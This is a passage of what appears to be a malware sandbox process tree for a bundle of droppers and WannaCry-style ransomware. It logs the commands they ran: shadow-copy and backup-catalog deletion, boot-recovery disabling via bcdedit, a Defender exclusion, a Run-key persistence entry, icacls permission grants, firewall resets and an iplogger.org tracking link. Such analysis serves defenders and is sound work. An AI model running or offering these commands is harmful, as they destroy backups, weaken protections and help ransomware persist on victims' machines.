        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\1111.exe
        5⤵
        
        PID:6212
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6212 -s 168
        6⤵
        Program crash
        
        PID:6464
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\wr.exe"
      4⤵
      Drops file in Windows directory
      PID:784
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\wr.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\wr.exe
        5⤵
        Modifies system certificate store
        
        PID:5664
      - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\avgrec.exe
        
        "" ""
        6⤵
        
        PID:4772
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\gate3_64.exe"
      4⤵
      PID:6140
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\gate3_64.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\gate3_64.exe
        5⤵
        
        PID:3380
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\USER%2~1.EXE"
      4⤵
      PID:6008
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\USER%2~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\USER%2~1.EXE
        5⤵
        
        PID:1968
      - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\USER%2~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\USER%2~1.EXE
        6⤵
        
        PID:2848
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ISetup5.exe"
      4⤵
      PID:5756
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ISetup5.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ISetup5.exe
        5⤵
        
        PID:6972
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\U5DO0~1.EXE"
        6⤵
        
        PID:4816
        
        C:\Users\Admin\AppData\Local\Temp\U5DO0~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\U5DO0~1.EXE
        7⤵
        
        PID:6536
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\U5DO1~1.EXE"
        6⤵
        
        PID:908
        
        C:\Users\Admin\AppData\Local\Temp\U5DO1~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\U5DO1~1.EXE
        7⤵
        
        PID:6956
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6972 -s 1544
        6⤵
        Program crash
        
        PID:3488
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\syncUpd.exe"
      4⤵
      PID:6384
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\syncUpd.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\syncUpd.exe
        5⤵
        
        PID:7004
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\JEGDGIIJJE.exe"
        6⤵
        
        PID:5720
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\blue2_A1.exe"
      4⤵
      PID:3240
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\blue2_A1.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\blue2_A1.exe
        5⤵
        
        PID:1140
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\crypted.exe"
      4⤵
      PID:4624
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\crypted.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\crypted.exe
        5⤵
        
        PID:3360
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ISetup2.exe"
      4⤵
      PID:4396
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ISetup2.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ISetup2.exe
        5⤵
        
        PID:1432
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\U13S0~1.EXE"
        6⤵
        
        PID:1176
        
        C:\Users\Admin\AppData\Local\Temp\U13S0~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\U13S0~1.EXE
        7⤵
        
        PID:6916
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\U13S1~1.EXE"
        6⤵
        
        PID:6712
        
        C:\Users\Admin\AppData\Local\Temp\U13S1~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\U13S1~1.EXE
        7⤵
        
        PID:1460
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1432 -s 1152
        6⤵
        Program crash
        
        PID:5428
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Pgp-Soft.exe"
      4⤵
      PID:6656
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Pgp-Soft.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Pgp-Soft.exe
        5⤵
        
        PID:3336
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ghjk.exe"
      4⤵
      PID:6460
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ghjk.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ghjk.exe
        5⤵
        
        PID:6532
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\hv.exe"
      4⤵
      PID:3392
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\hv.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\hv.exe
        5⤵
        
        PID:7152
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\KB^FR_~1.EXE"
      4⤵
      PID:6944
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\KB^FR_~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\KB^FR_~1.EXE
        5⤵
        
        PID:1960
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1960 -s 728
        6⤵
        Program crash
        
        PID:4440
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\svcrun.exe"
      4⤵
      PID:3036
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\svcrun.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\svcrun.exe
        5⤵
        
        PID:5972
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
        6⤵
        
        PID:2900
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Pilgzi.exe"
      4⤵
      PID:1804
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Pilgzi.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Pilgzi.exe
        5⤵
        
        PID:5472
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\TEAMVI~1.EXE"
      4⤵
      PID:6936
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\TEAMVI~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\TEAMVI~1.EXE
        5⤵
        
        PID:5436
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe
    "bot.exe"
    3⤵
    - Executes dropped EXE
    - Modifies system executable filetype association
    - Drops file in Program Files directory
    - Drops file in Windows directory
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    PID:1508
  - - C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe
      "C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe"
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      Drops autorun.inf file
      Modifies registry class
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2136
    - - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\TEMPEX~1.EXE"
        5⤵
        Executes dropped EXE
        Drops file in Windows directory
        
        PID:5820
      - C:\Users\Admin\AppData\Local\TEMPEX~1.EXE
        
        C:\Users\Admin\AppData\Local\TEMPEX~1.EXE
        6⤵
        Executes dropped EXE
        Modifies registry class
        
        PID:5872
        
        C:\Users\Admin\AppData\Local\TEMPEX~1Srv.exe
        
        C:\Users\Admin\AppData\Local\TEMPEX~1Srv.exe
        7⤵
        Executes dropped EXE
        
        PID:4788
        
        C:\Users\Admin\AppData\Local\TEMPEX~1SrvSrv.exe
        
        C:\Users\Admin\AppData\Local\TEMPEX~1SrvSrv.exe
        8⤵
        Executes dropped EXE
        
        PID:6084
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6084 -s 320
        9⤵
        Program crash
        
        PID:5740
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6084 -s 320
        9⤵
        Program crash
        
        PID:4508
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4788 -s 328
        8⤵
        Program crash
        
        PID:3060
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4788 -s 328
        8⤵
        Program crash
        
        PID:1932
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\A052.tmp\splitterrypted.vbs
        7⤵
        Executes dropped EXE
        
        PID:2712
        
        C:\Windows\SysWOW64\wscript.exe
        
        C:\Windows\System32\wscript.exe C:\Users\Admin\AppData\Local\Temp\A052.tmp\splitterrypted.vbs
        8⤵
        Drops file in Program Files directory
        
        PID:5624
    - - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\TEMPSP~1.EXE"
        5⤵
        Executes dropped EXE
        
        PID:6132
      - C:\Users\Admin\AppData\Local\TEMPSP~1.EXE
        
        C:\Users\Admin\AppData\Local\TEMPSP~1.EXE
        6⤵
        Executes dropped EXE
        Modifies registry class
        
        PID:1292
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\A294.tmp\spwak.vbs
        7⤵
        Executes dropped EXE
        Drops file in Windows directory
        
        PID:3308
        
        C:\Windows\SysWOW64\wscript.exe
        
        C:\Windows\System32\wscript.exe C:\Users\Admin\AppData\Local\Temp\A294.tmp\spwak.vbs
        8⤵
        
        PID:5744
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]
    "[email protected]"
    3⤵
    - Drops startup file
    - Executes dropped EXE
    - Enumerates connected drives
    - Drops file in System32 directory
    - Sets desktop wallpaper using registry
    - Drops file in Windows directory
    - Modifies registry class
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1960
  - - C:\Windows\SysWOW64\netsh.exe
      C:\Windows\system32\netsh.exe advfirewall set allprofiles state on
      4⤵
      Modifies Windows Firewall
      PID:900
  - - C:\Windows\SysWOW64\netsh.exe
      C:\Windows\system32\netsh.exe advfirewall reset
      4⤵
      Modifies Windows Firewall
      PID:1604
  - - C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\_R_E_A_D___T_H_I_S___EWUIK3M_.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
      4⤵
      PID:6552
  - - C:\Windows\SysWOW64\NOTEPAD.EXE
      "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\_R_E_A_D___T_H_I_S___IWQCG_.txt
      4⤵
      Opens file in notepad (likely ransom note)
      PID:5808
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Windows\system32\cmd.exe" /d /c taskkill /f /im "E" > NUL & ping -n 1 127.0.0.1 > NUL & del "C" > NUL && exit
      4⤵
      Executes dropped EXE
      Drops file in Windows directory
      PID:6500
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /d /c taskkill /f /im E > NUL & ping -n 1 127.0.0.1 > NUL & del C > NUL && exit
        5⤵
        
        PID:4384
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im E
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2232
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 1 127.0.0.1
        6⤵
        Runs ping.exe
        
        PID:6132
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]
    "[email protected]"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious behavior: EnumeratesProcesses
    PID:1664
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]
    "[email protected]"
    3⤵
    - Drops startup file
    - Executes dropped EXE
    - Sets desktop wallpaper using registry
    - Suspicious use of WriteProcessMemory
    PID:780
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +h .
      4⤵
      DcRat
      Views/modifies file attributes
      PID:1048
  - - C:\Windows\SysWOW64\icacls.exe
      icacls . /grant Everyone:F /T /C /Q
      4⤵
      Modifies file permissions
      PID:2532
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      Executes dropped EXE
      PID:2376
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c 291531712738554.bat
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4696
    - - C:\Windows\SysWOW64\cscript.exe
        
        cscript.exe //nologo m.vbs
        5⤵
        
        PID:2444
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      Executes dropped EXE
      PID:2376
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      Executes dropped EXE
      PID:3572
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +h +s F:\$RECYCLE
      4⤵
      Views/modifies file attributes
      PID:5272
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      Executes dropped EXE
      PID:5184
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      Executes dropped EXE
      PID:4636
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      Executes dropped EXE
      PID:6876
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      Executes dropped EXE
      PID:6688
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      Executes dropped EXE
      PID:6824
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:6688
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:5728
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected] co
      4⤵
      Suspicious use of SetWindowsHookEx
      PID:6540
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c start /b @[email protected] vs
      4⤵
      PID:6948
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
        
        @[email protected] vs
        5⤵
        
        PID:3364
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
        6⤵
        
        PID:6712
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic shadowcopy delete
        7⤵
        
        PID:4412
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:2720
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:6448
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:3584
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "vfjxtaorfuauqli296" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\RarSFX0\tasksche.exe\"" /f
      4⤵
      PID:5736
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:5588
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:3000
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:6664
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:352
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:6396
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:6244
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:6528
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:5972
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:2928
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:3384
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:5728
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:2044
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:1948
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:1244
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\RIP_YOUR_PC_LOL.exe
    "RIP_YOUR_PC_LOL.exe"
    3⤵
    - Executes dropped EXE
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    PID:2324
  - - C:\Users\Admin\Desktop\1.exe
      "C:\Users\Admin\Desktop\1.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:3220
    - - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\F27E.tmp\F27F.tmp\F280.bat C:\Users\Admin\Desktop\1.exe"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2844
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/2bB2s6
        6⤵
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of WriteProcessMemory
        
        PID:3840
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x104,0x108,0x10c,0x100,0x110,0x7ffeda773cb8,0x7ffeda773cc8,0x7ffeda773cd8
        7⤵
        
        PID:4668
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1916,8497628774922488027,8174967378299823448,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1928 /prefetch:2
        7⤵
        
        PID:2888
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1916,8497628774922488027,8174967378299823448,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2360 /prefetch:3
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4692
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1916,8497628774922488027,8174967378299823448,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2768 /prefetch:8
        7⤵
        
        PID:1144
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,8497628774922488027,8174967378299823448,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3264 /prefetch:1
        7⤵
        
        PID:4068
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,8497628774922488027,8174967378299823448,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3276 /prefetch:1
        7⤵
        
        PID:1536
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,8497628774922488027,8174967378299823448,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4824 /prefetch:1
        7⤵
        
        PID:952
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,8497628774922488027,8174967378299823448,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5492 /prefetch:1
        7⤵
        
        PID:3316
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,8497628774922488027,8174967378299823448,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5608 /prefetch:1
        7⤵
        
        PID:2796
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,8497628774922488027,8174967378299823448,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5884 /prefetch:1
        7⤵
        
        PID:1612
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1916,8497628774922488027,8174967378299823448,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6092 /prefetch:8
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5428
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1916,8497628774922488027,8174967378299823448,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=6096 /prefetch:2
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:6172
        
        C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1916,8497628774922488027,8174967378299823448,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6364 /prefetch:8
        7⤵
        Executes dropped EXE
        Modifies registry class
        
        PID:6400
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\IDENTI~1.EXE" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1916,8497628774922488027,8174967378299823448,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6364 /prefetch:8
        8⤵
        Executes dropped EXE
        
        PID:6756
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\IDENTI~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\IDENTI~1.EXE --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1916,8497628774922488027,8174967378299823448,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6364 /prefetch:8
        9⤵
        Executes dropped EXE
        
        PID:504
  - - C:\Users\Admin\Desktop\10.exe
      "C:\Users\Admin\Desktop\10.exe"
      4⤵
      Executes dropped EXE
      PID:4796
    - - C:\Windows\SysWOW64\attrib.exe
        
        attrib +h .
        5⤵
        Views/modifies file attributes
        
        PID:2416
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls . /grant Everyone:F /T /C /Q
        5⤵
        Modifies file permissions
        
        PID:2204
  - - C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
      "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Desktop\2.doc" /o ""
      4⤵
      PID:2892
  - - C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
